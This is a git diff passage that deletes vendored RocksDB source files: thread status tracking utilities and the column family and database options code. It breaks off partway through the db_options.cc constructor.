-#include <mutex>
-
-#include "db/column_family.h"
-#include "monitoring/thread_status_updater.h"
-
-namespace rocksdb {
-
-#ifndef NDEBUG
-#ifdef ROCKSDB_USING_THREAD_STATUS
-void ThreadStatusUpdater::TEST_VerifyColumnFamilyInfoMap(
-    const std::vector<ColumnFamilyHandle*>& handles,
-    bool check_exist) {
-  std::unique_lock<std::mutex> lock(thread_list_mutex_);
-  if (check_exist) {
-    assert(cf_info_map_.size() == handles.size());
-  }
-  for (auto* handle : handles) {
-    auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(handle)->cfd();
-    auto iter __attribute__((unused)) = cf_info_map_.find(cfd);
-    if (check_exist) {
-      assert(iter != cf_info_map_.end());
-      assert(iter->second);
-      assert(iter->second->cf_name == cfd->GetName());
-    } else {
-      assert(iter == cf_info_map_.end());
-    }
-  }
-}
-
-#else
-
-void ThreadStatusUpdater::TEST_VerifyColumnFamilyInfoMap(
-    const std::vector<ColumnFamilyHandle*>& handles,
-    bool check_exist) {
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-#endif  // !NDEBUG
-
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_util.cc b/thirdparty/rocksdb/monitoring/thread_status_util.cc
deleted file mode 100644
index 50692df..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_util.cc
+++ /dev/null
@@ -1,222 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/thread_status_util.h"
-
-#include "monitoring/thread_status_updater.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-__thread ThreadStatusUpdater*
-    ThreadStatusUtil::thread_updater_local_cache_ = nullptr;
-__thread bool ThreadStatusUtil::thread_updater_initialized_ = false;
-
-void ThreadStatusUtil::RegisterThread(
-    const Env* env, ThreadStatus::ThreadType thread_type) {
-  if (!MaybeInitThreadLocalUpdater(env)) {
-    return;
-  }
-  assert(thread_updater_local_cache_);
-  thread_updater_local_cache_->RegisterThread(
-      thread_type, env->GetThreadID());
-}
-
-void ThreadStatusUtil::UnregisterThread() {
-  thread_updater_initialized_ = false;
-  if (thread_updater_local_cache_ != nullptr) {
-    thread_updater_local_cache_->UnregisterThread();
-    thread_updater_local_cache_ = nullptr;
-  }
-}
-
-void ThreadStatusUtil::SetColumnFamily(const ColumnFamilyData* cfd,
-                                       const Env* env,
-                                       bool enable_thread_tracking) {
-  if (!MaybeInitThreadLocalUpdater(env)) {
-    return;
-  }
-  assert(thread_updater_local_cache_);
-  if (cfd != nullptr && enable_thread_tracking) {
-    thread_updater_local_cache_->SetColumnFamilyInfoKey(cfd);
-  } else {
-    // When cfd == nullptr or enable_thread_tracking == false, we set
-    // ColumnFamilyInfoKey to nullptr, which makes SetThreadOperation
-    // and SetThreadState become no-op.
-    thread_updater_local_cache_->SetColumnFamilyInfoKey(nullptr);
-  }
-}
-
-void ThreadStatusUtil::SetThreadOperation(ThreadStatus::OperationType op) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  if (op != ThreadStatus::OP_UNKNOWN) {
-    uint64_t current_time = Env::Default()->NowMicros();
-    thread_updater_local_cache_->SetOperationStartTime(current_time);
-  } else {
-    // TDOO(yhchiang): we could report the time when we set operation to
-    // OP_UNKNOWN once the whole instrumentation has been done.
-    thread_updater_local_cache_->SetOperationStartTime(0);
-  }
-  thread_updater_local_cache_->SetThreadOperation(op);
-}
-
-ThreadStatus::OperationStage ThreadStatusUtil::SetThreadOperationStage(
-    ThreadStatus::OperationStage stage) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return ThreadStatus::STAGE_UNKNOWN;
-  }
-
-  return thread_updater_local_cache_->SetThreadOperationStage(stage);
-}
-
-void ThreadStatusUtil::SetThreadOperationProperty(
-    int code, uint64_t value) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  thread_updater_local_cache_->SetThreadOperationProperty(
-      code, value);
-}
-
-void ThreadStatusUtil::IncreaseThreadOperationProperty(
-    int code, uint64_t delta) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  thread_updater_local_cache_->IncreaseThreadOperationProperty(
-      code, delta);
-}
-
-void ThreadStatusUtil::SetThreadState(ThreadStatus::StateType state) {
-  if (thread_updater_local_cache_ == nullptr) {
-    // thread_updater_local_cache_ must be set in SetColumnFamily
-    // or other ThreadStatusUtil functions.
-    return;
-  }
-
-  thread_updater_local_cache_->SetThreadState(state);
-}
-
-void ThreadStatusUtil::ResetThreadStatus() {
-  if (thread_updater_local_cache_ == nullptr) {
-    return;
-  }
-  thread_updater_local_cache_->ResetThreadStatus();
-}
-
-void ThreadStatusUtil::NewColumnFamilyInfo(const DB* db,
-                                           const ColumnFamilyData* cfd,
-                                           const std::string& cf_name,
-                                           const Env* env) {
-  if (!MaybeInitThreadLocalUpdater(env)) {
-    return;
-  }
-  assert(thread_updater_local_cache_);
-  if (thread_updater_local_cache_) {
-    thread_updater_local_cache_->NewColumnFamilyInfo(db, db->GetName(), cfd,
-                                                     cf_name);
-  }
-}
-
-void ThreadStatusUtil::EraseColumnFamilyInfo(
-    const ColumnFamilyData* cfd) {
-  if (thread_updater_local_cache_ == nullptr) {
-    return;
-  }
-  thread_updater_local_cache_->EraseColumnFamilyInfo(cfd);
-}
-
-void ThreadStatusUtil::EraseDatabaseInfo(const DB* db) {
-  ThreadStatusUpdater* thread_updater = db->GetEnv()->GetThreadStatusUpdater();
-  if (thread_updater == nullptr) {
-    return;
-  }
-  thread_updater->EraseDatabaseInfo(db);
-}
-
-bool ThreadStatusUtil::MaybeInitThreadLocalUpdater(const Env* env) {
-  if (!thread_updater_initialized_ && env != nullptr) {
-    thread_updater_initialized_ = true;
-    thread_updater_local_cache_ = env->GetThreadStatusUpdater();
-  }
-  return (thread_updater_local_cache_ != nullptr);
-}
-
-AutoThreadOperationStageUpdater::AutoThreadOperationStageUpdater(
-    ThreadStatus::OperationStage stage) {
-  prev_stage_ = ThreadStatusUtil::SetThreadOperationStage(stage);
-}
-
-AutoThreadOperationStageUpdater::~AutoThreadOperationStageUpdater() {
-  ThreadStatusUtil::SetThreadOperationStage(prev_stage_);
-}
-
-#else
-
-ThreadStatusUpdater* ThreadStatusUtil::thread_updater_local_cache_ = nullptr;
-bool ThreadStatusUtil::thread_updater_initialized_ = false;
-
-bool ThreadStatusUtil::MaybeInitThreadLocalUpdater(const Env* env) {
-  return false;
-}
-
-void ThreadStatusUtil::SetColumnFamily(const ColumnFamilyData* cfd,
-                                       const Env* env,
-                                       bool enable_thread_tracking) {}
-
-void ThreadStatusUtil::SetThreadOperation(ThreadStatus::OperationType op) {
-}
-
-void ThreadStatusUtil::SetThreadOperationProperty(
-    int code, uint64_t value) {
-}
-
-void ThreadStatusUtil::IncreaseThreadOperationProperty(
-    int code, uint64_t delta) {
-}
-
-void ThreadStatusUtil::SetThreadState(ThreadStatus::StateType state) {
-}
-
-void ThreadStatusUtil::NewColumnFamilyInfo(const DB* db,
-                                           const ColumnFamilyData* cfd,
-                                           const std::string& cf_name,
-                                           const Env* env) {}
-
-void ThreadStatusUtil::EraseColumnFamilyInfo(
-    const ColumnFamilyData* cfd) {
-}
-
-void ThreadStatusUtil::EraseDatabaseInfo(const DB* db) {
-}
-
-void ThreadStatusUtil::ResetThreadStatus() {
-}
-
-AutoThreadOperationStageUpdater::AutoThreadOperationStageUpdater(
-    ThreadStatus::OperationStage stage) {
-}
-
-AutoThreadOperationStageUpdater::~AutoThreadOperationStageUpdater() {
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_util.h b/thirdparty/rocksdb/monitoring/thread_status_util.h
deleted file mode 100644
index a403435..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_util.h
+++ /dev/null
@@ -1,134 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-
-#include "monitoring/thread_status_updater.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/thread_status.h"
-
-namespace rocksdb {
-
-class ColumnFamilyData;
-
-// The static utility class for updating thread-local status.
-//
-// The thread-local status is updated via the thread-local cached
-// pointer thread_updater_local_cache_.  During each function call,
-// when ThreadStatusUtil finds thread_updater_local_cache_ is
-// left uninitialized (determined by thread_updater_initialized_),
-// it will tries to initialize it using the return value of
-// Env::GetThreadStatusUpdater().  When thread_updater_local_cache_
-// is initialized by a non-null pointer, each function call will
-// then update the status of the current thread.  Otherwise,
-// all function calls to ThreadStatusUtil will be no-op.
-class ThreadStatusUtil {
- public:
-  // Register the current thread for tracking.
-  static void RegisterThread(
-      const Env* env, ThreadStatus::ThreadType thread_type);
-
-  // Unregister the current thread.
-  static void UnregisterThread();
-
-  // Create an entry in the global ColumnFamilyInfo table for the
-  // specified column family.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  static void NewColumnFamilyInfo(const DB* db, const ColumnFamilyData* cfd,
-                                  const std::string& cf_name, const Env* env);
-
-  // Erase the ConstantColumnFamilyInfo that is associated with the
-  // specified ColumnFamilyData.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  static void EraseColumnFamilyInfo(const ColumnFamilyData* cfd);
-
-  // Erase all ConstantColumnFamilyInfo that is associated with the
-  // specified db instance.  This function should be called only when
-  // the current thread does not hold db_mutex.
-  static void EraseDatabaseInfo(const DB* db);
-
-  // Update the thread status to indicate the current thread is doing
-  // something related to the specified column family.
-  static void SetColumnFamily(const ColumnFamilyData* cfd, const Env* env,
-                              bool enable_thread_tracking);
-
-  static void SetThreadOperation(ThreadStatus::OperationType type);
-
-  static ThreadStatus::OperationStage SetThreadOperationStage(
-      ThreadStatus::OperationStage stage);
-
-  static void SetThreadOperationProperty(
-      int code, uint64_t value);
-
-  static void IncreaseThreadOperationProperty(
-      int code, uint64_t delta);
-
-  static void SetThreadState(ThreadStatus::StateType type);
-
-  static void ResetThreadStatus();
-
-#ifndef NDEBUG
-  static void TEST_SetStateDelay(
-      const ThreadStatus::StateType state, int micro);
-  static void TEST_StateDelay(const ThreadStatus::StateType state);
-#endif
-
- protected:
-  // Initialize the thread-local ThreadStatusUpdater when it finds
-  // the cached value is nullptr.  Returns true if it has cached
-  // a non-null pointer.
-  static bool MaybeInitThreadLocalUpdater(const Env* env);
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  // A boolean flag indicating whether thread_updater_local_cache_
-  // is initialized.  It is set to true when an Env uses any
-  // ThreadStatusUtil functions using the current thread other
-  // than UnregisterThread().  It will be set to false when
-  // UnregisterThread() is called.
-  //
-  // When this variable is set to true, thread_updater_local_cache_
-  // will not be updated until this variable is again set to false
-  // in UnregisterThread().
-  static  __thread bool thread_updater_initialized_;
-
-  // The thread-local cached ThreadStatusUpdater that caches the
-  // thread_status_updater_ of the first Env that uses any ThreadStatusUtil
-  // function other than UnregisterThread().  This variable will
-  // be cleared when UnregisterThread() is called.
-  //
-  // When this variable is set to a non-null pointer, then the status
-  // of the current thread will be updated when a function of
-  // ThreadStatusUtil is called.  Otherwise, all functions of
-  // ThreadStatusUtil will be no-op.
-  //
-  // When thread_updater_initialized_ is set to true, this variable
-  // will not be updated until this thread_updater_initialized_ is
-  // again set to false in UnregisterThread().
-  static __thread ThreadStatusUpdater* thread_updater_local_cache_;
-#else
-  static bool thread_updater_initialized_;
-  static ThreadStatusUpdater* thread_updater_local_cache_;
-#endif
-};
-
-// A helper class for updating thread state.  It will set the
-// thread state according to the input parameter in its constructor
-// and set the thread state to the previous state in its destructor.
-class AutoThreadOperationStageUpdater {
- public:
-  explicit AutoThreadOperationStageUpdater(
-      ThreadStatus::OperationStage stage);
-  ~AutoThreadOperationStageUpdater();
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
- private:
-  ThreadStatus::OperationStage prev_stage_;
-#endif
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_util_debug.cc b/thirdparty/rocksdb/monitoring/thread_status_util_debug.cc
deleted file mode 100644
index b4fa584..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_util_debug.cc
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <atomic>
-
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-#ifndef NDEBUG
-// the delay for debugging purpose.
-static std::atomic<int> states_delay[ThreadStatus::NUM_STATE_TYPES];
-
-void ThreadStatusUtil::TEST_SetStateDelay(
-    const ThreadStatus::StateType state, int micro) {
-  states_delay[state].store(micro, std::memory_order_relaxed);
-}
-
-void ThreadStatusUtil::TEST_StateDelay(const ThreadStatus::StateType state) {
-  auto delay = states_delay[state].load(std::memory_order_relaxed);
-  if (delay > 0) {
-    Env::Default()->SleepForMicroseconds(delay);
-  }
-}
-
-#endif  // !NDEBUG
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/cf_options.cc b/thirdparty/rocksdb/options/cf_options.cc
deleted file mode 100644
index 67cbef6..0000000
--- a/thirdparty/rocksdb/options/cf_options.cc
+++ /dev/null
@@ -1,179 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "options/cf_options.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <cassert>
-#include <limits>
-#include <string>
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-ImmutableCFOptions::ImmutableCFOptions(const Options& options)
-    : ImmutableCFOptions(ImmutableDBOptions(options), options) {}
-
-ImmutableCFOptions::ImmutableCFOptions(const ImmutableDBOptions& db_options,
-                                       const ColumnFamilyOptions& cf_options)
-    : compaction_style(cf_options.compaction_style),
-      compaction_pri(cf_options.compaction_pri),
-      compaction_options_universal(cf_options.compaction_options_universal),
-      compaction_options_fifo(cf_options.compaction_options_fifo),
-      prefix_extractor(cf_options.prefix_extractor.get()),
-      user_comparator(cf_options.comparator),
-      internal_comparator(InternalKeyComparator(cf_options.comparator)),
-      merge_operator(cf_options.merge_operator.get()),
-      compaction_filter(cf_options.compaction_filter),
-      compaction_filter_factory(cf_options.compaction_filter_factory.get()),
-      min_write_buffer_number_to_merge(
-          cf_options.min_write_buffer_number_to_merge),
-      max_write_buffer_number_to_maintain(
-          cf_options.max_write_buffer_number_to_maintain),
-      inplace_update_support(cf_options.inplace_update_support),
-      inplace_callback(cf_options.inplace_callback),
-      info_log(db_options.info_log.get()),
-      statistics(db_options.statistics.get()),
-      rate_limiter(db_options.rate_limiter.get()),
-      env(db_options.env),
-      allow_mmap_reads(db_options.allow_mmap_reads),
-      allow_mmap_writes(db_options.allow_mmap_writes),
-      db_paths(db_options.db_paths),
-      memtable_factory(cf_options.memtable_factory.get()),
-      table_factory(cf_options.table_factory.get()),
-      table_properties_collector_factories(
-          cf_options.table_properties_collector_factories),
-      advise_random_on_open(db_options.advise_random_on_open),
-      bloom_locality(cf_options.bloom_locality),
-      purge_redundant_kvs_while_flush(
-          cf_options.purge_redundant_kvs_while_flush),
-      use_fsync(db_options.use_fsync),
-      compression_per_level(cf_options.compression_per_level),
-      bottommost_compression(cf_options.bottommost_compression),
-      compression_opts(cf_options.compression_opts),
-      level_compaction_dynamic_level_bytes(
-          cf_options.level_compaction_dynamic_level_bytes),
-      access_hint_on_compaction_start(
-          db_options.access_hint_on_compaction_start),
-      new_table_reader_for_compaction_inputs(
-          db_options.new_table_reader_for_compaction_inputs),
-      compaction_readahead_size(db_options.compaction_readahead_size),
-      num_levels(cf_options.num_levels),
-      optimize_filters_for_hits(cf_options.optimize_filters_for_hits),
-      force_consistency_checks(cf_options.force_consistency_checks),
-      allow_ingest_behind(db_options.allow_ingest_behind),
-      listeners(db_options.listeners),
-      row_cache(db_options.row_cache),
-      max_subcompactions(db_options.max_subcompactions),
-      memtable_insert_with_hint_prefix_extractor(
-          cf_options.memtable_insert_with_hint_prefix_extractor.get()) {}
-
-// Multiple two operands. If they overflow, return op1.
-uint64_t MultiplyCheckOverflow(uint64_t op1, double op2) {
-  if (op1 == 0 || op2 <= 0) {
-    return 0;
-  }
-  if (port::kMaxUint64 / op1 < op2) {
-    return op1;
-  }
-  return static_cast<uint64_t>(op1 * op2);
-}
-
-void MutableCFOptions::RefreshDerivedOptions(int num_levels,
-                                             CompactionStyle compaction_style) {
-  max_file_size.resize(num_levels);
-  for (int i = 0; i < num_levels; ++i) {
-    if (i == 0 && compaction_style == kCompactionStyleUniversal) {
-      max_file_size[i] = ULLONG_MAX;
-    } else if (i > 1) {
-      max_file_size[i] = MultiplyCheckOverflow(max_file_size[i - 1],
-                                               target_file_size_multiplier);
-    } else {
-      max_file_size[i] = target_file_size_base;
-    }
-  }
-}
-
-uint64_t MutableCFOptions::MaxFileSizeForLevel(int level) const {
-  assert(level >= 0);
-  assert(level < (int)max_file_size.size());
-  return max_file_size[level];
-}
-
-void MutableCFOptions::Dump(Logger* log) const {
-  // Memtable related options
-  ROCKS_LOG_INFO(log,
-                 "                        write_buffer_size: %" ROCKSDB_PRIszt,
-                 write_buffer_size);
-  ROCKS_LOG_INFO(log, "                  max_write_buffer_number: %d",
-                 max_write_buffer_number);
-  ROCKS_LOG_INFO(log,
-                 "                         arena_block_size: %" ROCKSDB_PRIszt,
-                 arena_block_size);
-  ROCKS_LOG_INFO(log, "              memtable_prefix_bloom_ratio: %f",
-                 memtable_prefix_bloom_size_ratio);
-  ROCKS_LOG_INFO(log,
-                 "                  memtable_huge_page_size: %" ROCKSDB_PRIszt,
-                 memtable_huge_page_size);
-  ROCKS_LOG_INFO(log,
-                 "                    max_successive_merges: %" ROCKSDB_PRIszt,
-                 max_successive_merges);
-  ROCKS_LOG_INFO(log,
-                 "                 inplace_update_num_locks: %" ROCKSDB_PRIszt,
-                 inplace_update_num_locks);
-  ROCKS_LOG_INFO(log, "                 disable_auto_compactions: %d",
-                 disable_auto_compactions);
-  ROCKS_LOG_INFO(log, "      soft_pending_compaction_bytes_limit: %" PRIu64,
-                 soft_pending_compaction_bytes_limit);
-  ROCKS_LOG_INFO(log, "      hard_pending_compaction_bytes_limit: %" PRIu64,
-                 hard_pending_compaction_bytes_limit);
-  ROCKS_LOG_INFO(log, "       level0_file_num_compaction_trigger: %d",
-                 level0_file_num_compaction_trigger);
-  ROCKS_LOG_INFO(log, "           level0_slowdown_writes_trigger: %d",
-                 level0_slowdown_writes_trigger);
-  ROCKS_LOG_INFO(log, "               level0_stop_writes_trigger: %d",
-                 level0_stop_writes_trigger);
-  ROCKS_LOG_INFO(log, "                     max_compaction_bytes: %" PRIu64,
-                 max_compaction_bytes);
-  ROCKS_LOG_INFO(log, "                    target_file_size_base: %" PRIu64,
-                 target_file_size_base);
-  ROCKS_LOG_INFO(log, "              target_file_size_multiplier: %d",
-                 target_file_size_multiplier);
-  ROCKS_LOG_INFO(log, "                 max_bytes_for_level_base: %" PRIu64,
-                 max_bytes_for_level_base);
-  ROCKS_LOG_INFO(log, "           max_bytes_for_level_multiplier: %f",
-                 max_bytes_for_level_multiplier);
-  std::string result;
-  char buf[10];
-  for (const auto m : max_bytes_for_level_multiplier_additional) {
-    snprintf(buf, sizeof(buf), "%d, ", m);
-    result += buf;
-  }
-  if (result.size() >= 2) {
-    result.resize(result.size() - 2);
-  } else {
-    result = "";
-  }
-
-  ROCKS_LOG_INFO(log, "max_bytes_for_level_multiplier_additional: %s",
-                 result.c_str());
-  ROCKS_LOG_INFO(log, "        max_sequential_skip_in_iterations: %" PRIu64,
-                 max_sequential_skip_in_iterations);
-  ROCKS_LOG_INFO(log, "                     paranoid_file_checks: %d",
-                 paranoid_file_checks);
-  ROCKS_LOG_INFO(log, "                       report_bg_io_stats: %d",
-                 report_bg_io_stats);
-  ROCKS_LOG_INFO(log, "                              compression: %d",
-                 static_cast<int>(compression));
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/cf_options.h b/thirdparty/rocksdb/options/cf_options.h
deleted file mode 100644
index f376729..0000000
--- a/thirdparty/rocksdb/options/cf_options.h
+++ /dev/null
@@ -1,239 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "options/db_options.h"
-#include "rocksdb/options.h"
-#include "util/compression.h"
-
-namespace rocksdb {
-
-// ImmutableCFOptions is a data struct used by RocksDB internal. It contains a
-// subset of Options that should not be changed during the entire lifetime
-// of DB. Raw pointers defined in this struct do not have ownership to the data
-// they point to. Options contains shared_ptr to these data.
-struct ImmutableCFOptions {
-  ImmutableCFOptions();
-  explicit ImmutableCFOptions(const Options& options);
-
-  ImmutableCFOptions(const ImmutableDBOptions& db_options,
-                     const ColumnFamilyOptions& cf_options);
-
-  CompactionStyle compaction_style;
-
-  CompactionPri compaction_pri;
-
-  CompactionOptionsUniversal compaction_options_universal;
-  CompactionOptionsFIFO compaction_options_fifo;
-
-  const SliceTransform* prefix_extractor;
-
-  const Comparator* user_comparator;
-  InternalKeyComparator internal_comparator;
-
-  MergeOperator* merge_operator;
-
-  const CompactionFilter* compaction_filter;
-
-  CompactionFilterFactory* compaction_filter_factory;
-
-  int min_write_buffer_number_to_merge;
-
-  int max_write_buffer_number_to_maintain;
-
-  bool inplace_update_support;
-
-  UpdateStatus (*inplace_callback)(char* existing_value,
-                                   uint32_t* existing_value_size,
-                                   Slice delta_value,
-                                   std::string* merged_value);
-
-  Logger* info_log;
-
-  Statistics* statistics;
-
-  RateLimiter* rate_limiter;
-
-  InfoLogLevel info_log_level;
-
-  Env* env;
-
-  // Allow the OS to mmap file for reading sst tables. Default: false
-  bool allow_mmap_reads;
-
-  // Allow the OS to mmap file for writing. Default: false
-  bool allow_mmap_writes;
-
-  std::vector<DbPath> db_paths;
-
-  MemTableRepFactory* memtable_factory;
-
-  TableFactory* table_factory;
-
-  Options::TablePropertiesCollectorFactories
-      table_properties_collector_factories;
-
-  bool advise_random_on_open;
-
-  // This options is required by PlainTableReader. May need to move it
-  // to PlainTableOptions just like bloom_bits_per_key
-  uint32_t bloom_locality;
-
-  bool purge_redundant_kvs_while_flush;
-
-  bool use_fsync;
-
-  std::vector<CompressionType> compression_per_level;
-
-  CompressionType bottommost_compression;
-
-  CompressionOptions compression_opts;
-
-  bool level_compaction_dynamic_level_bytes;
-
-  Options::AccessHint access_hint_on_compaction_start;
-
-  bool new_table_reader_for_compaction_inputs;
-
-  size_t compaction_readahead_size;
-
-  int num_levels;
-
-  bool optimize_filters_for_hits;
-
-  bool force_consistency_checks;
-
-  bool allow_ingest_behind;
-
-  // A vector of EventListeners which call-back functions will be called
-  // when specific RocksDB event happens.
-  std::vector<std::shared_ptr<EventListener>> listeners;
-
-  std::shared_ptr<Cache> row_cache;
-
-  uint32_t max_subcompactions;
-
-  const SliceTransform* memtable_insert_with_hint_prefix_extractor;
-};
-
-struct MutableCFOptions {
-  explicit MutableCFOptions(const ColumnFamilyOptions& options)
-      : write_buffer_size(options.write_buffer_size),
-        max_write_buffer_number(options.max_write_buffer_number),
-        arena_block_size(options.arena_block_size),
-        memtable_prefix_bloom_size_ratio(
-            options.memtable_prefix_bloom_size_ratio),
-        memtable_huge_page_size(options.memtable_huge_page_size),
-        max_successive_merges(options.max_successive_merges),
-        inplace_update_num_locks(options.inplace_update_num_locks),
-        disable_auto_compactions(options.disable_auto_compactions),
-        soft_pending_compaction_bytes_limit(
-            options.soft_pending_compaction_bytes_limit),
-        hard_pending_compaction_bytes_limit(
-            options.hard_pending_compaction_bytes_limit),
-        level0_file_num_compaction_trigger(
-            options.level0_file_num_compaction_trigger),
-        level0_slowdown_writes_trigger(options.level0_slowdown_writes_trigger),
-        level0_stop_writes_trigger(options.level0_stop_writes_trigger),
-        max_compaction_bytes(options.max_compaction_bytes),
-        target_file_size_base(options.target_file_size_base),
-        target_file_size_multiplier(options.target_file_size_multiplier),
-        max_bytes_for_level_base(options.max_bytes_for_level_base),
-        max_bytes_for_level_multiplier(options.max_bytes_for_level_multiplier),
-        max_bytes_for_level_multiplier_additional(
-            options.max_bytes_for_level_multiplier_additional),
-        max_sequential_skip_in_iterations(
-            options.max_sequential_skip_in_iterations),
-        paranoid_file_checks(options.paranoid_file_checks),
-        report_bg_io_stats(options.report_bg_io_stats),
-        compression(options.compression) {
-    RefreshDerivedOptions(options.num_levels, options.compaction_style);
-  }
-
-  MutableCFOptions()
-      : write_buffer_size(0),
-        max_write_buffer_number(0),
-        arena_block_size(0),
-        memtable_prefix_bloom_size_ratio(0),
-        memtable_huge_page_size(0),
-        max_successive_merges(0),
-        inplace_update_num_locks(0),
-        disable_auto_compactions(false),
-        soft_pending_compaction_bytes_limit(0),
-        hard_pending_compaction_bytes_limit(0),
-        level0_file_num_compaction_trigger(0),
-        level0_slowdown_writes_trigger(0),
-        level0_stop_writes_trigger(0),
-        max_compaction_bytes(0),
-        target_file_size_base(0),
-        target_file_size_multiplier(0),
-        max_bytes_for_level_base(0),
-        max_bytes_for_level_multiplier(0),
-        max_sequential_skip_in_iterations(0),
-        paranoid_file_checks(false),
-        report_bg_io_stats(false),
-        compression(Snappy_Supported() ? kSnappyCompression : kNoCompression) {}
-
-  // Must be called after any change to MutableCFOptions
-  void RefreshDerivedOptions(int num_levels, CompactionStyle compaction_style);
-
-  void RefreshDerivedOptions(const ImmutableCFOptions& ioptions) {
-    RefreshDerivedOptions(ioptions.num_levels, ioptions.compaction_style);
-  }
-
-  // Get the max file size in a given level.
-  uint64_t MaxFileSizeForLevel(int level) const;
-  int MaxBytesMultiplerAdditional(int level) const {
-    if (level >=
-        static_cast<int>(max_bytes_for_level_multiplier_additional.size())) {
-      return 1;
-    }
-    return max_bytes_for_level_multiplier_additional[level];
-  }
-
-  void Dump(Logger* log) const;
-
-  // Memtable related options
-  size_t write_buffer_size;
-  int max_write_buffer_number;
-  size_t arena_block_size;
-  double memtable_prefix_bloom_size_ratio;
-  size_t memtable_huge_page_size;
-  size_t max_successive_merges;
-  size_t inplace_update_num_locks;
-
-  // Compaction related options
-  bool disable_auto_compactions;
-  uint64_t soft_pending_compaction_bytes_limit;
-  uint64_t hard_pending_compaction_bytes_limit;
-  int level0_file_num_compaction_trigger;
-  int level0_slowdown_writes_trigger;
-  int level0_stop_writes_trigger;
-  uint64_t max_compaction_bytes;
-  uint64_t target_file_size_base;
-  int target_file_size_multiplier;
-  uint64_t max_bytes_for_level_base;
-  double max_bytes_for_level_multiplier;
-  std::vector<int> max_bytes_for_level_multiplier_additional;
-
-  // Misc options
-  uint64_t max_sequential_skip_in_iterations;
-  bool paranoid_file_checks;
-  bool report_bg_io_stats;
-  CompressionType compression;
-
-  // Derived options
-  // Per-level target file size.
-  std::vector<uint64_t> max_file_size;
-};
-
-uint64_t MultiplyCheckOverflow(uint64_t op1, double op2);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/db_options.cc b/thirdparty/rocksdb/options/db_options.cc
deleted file mode 100644
index 6177575..0000000
--- a/thirdparty/rocksdb/options/db_options.cc
+++ /dev/null
@@ -1,275 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "options/db_options.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/sst_file_manager.h"
-#include "rocksdb/wal_filter.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-ImmutableDBOptions::ImmutableDBOptions() : ImmutableDBOptions(Options()) {}
-
-ImmutableDBOptions::ImmutableDBOptions(const DBOptions& options)
-    : create_if_missing(options.create_if_missing),
-      create_missing_column_families(options.create_missing_column_families),
-      error_if_exists(options.error_if_exists),
-      paranoid_checks(options.paranoid_checks),
-      env(options.env),
-      rate_limiter(options.rate_limiter),
-      sst_file_manager(options.sst_file_manager),
-      info_log(options.info_log),
-      info_log_level(options.info_log_level),
-      max_file_opening_threads(options.max_file_opening_threads),
-      statistics(options.statistics),
-      use_fsync(options.use_fsync),
-      db_paths(options.db_paths),
